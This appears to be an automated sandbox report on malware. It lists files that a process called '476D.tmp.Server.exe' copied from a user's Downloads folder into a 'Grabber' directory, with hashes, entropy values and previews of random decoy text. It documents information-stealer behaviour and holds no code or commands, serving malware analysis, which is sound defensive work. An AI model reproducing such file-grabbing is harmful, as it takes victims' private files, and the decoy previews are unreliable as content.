HQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

